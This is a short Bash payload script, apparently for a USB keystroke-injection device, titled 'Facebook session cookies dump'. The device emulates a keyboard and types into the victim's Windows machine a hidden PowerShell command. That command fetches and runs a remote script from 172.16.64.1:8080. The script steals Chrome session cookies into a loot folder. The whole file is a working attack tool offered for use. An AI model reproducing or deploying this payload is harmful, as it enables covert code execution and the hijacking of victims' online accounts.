#!/bin/bash
#
# Title:         Facebook session cookies dump
# Author:        oXis (inspired by illwill)
# Version:       2.0
#
# Dumps the stored session cookies from Chrome browser by downloading a Powershell script
# then stashes them in /root/udisk/loot/FacebookSession/l
# Credits to these guys for their powershell scripts:
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
# https://github.com/EmpireProject/Empire    Get-FoxDump.ps1
# Also credit to illwill for the BrowerCreds payload
#
# LED States 
# Setup.............Setup
# Blue..............Running Script
# White.............Setup RNDIS_ETHERNET
# Green.............Got Browser Creds


LED SETUP
LOOTDIR=/root/udisk/loot/FacebookSession
mkdir -p $LOOTDIR
ATTACKMODE HID
LED STAGE1
GET SWITCH_POSITION
cd /root/udisk/payloads/$SWITCH_POSITION/
./server.py &
sleep 1

#Dump Chrome Cookies
RUN WIN "powershell -WindowStyle Hidden \"while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}\""

LED STAGE2
ATTACKMODE RNDIS_ETHERNET

LED FINISH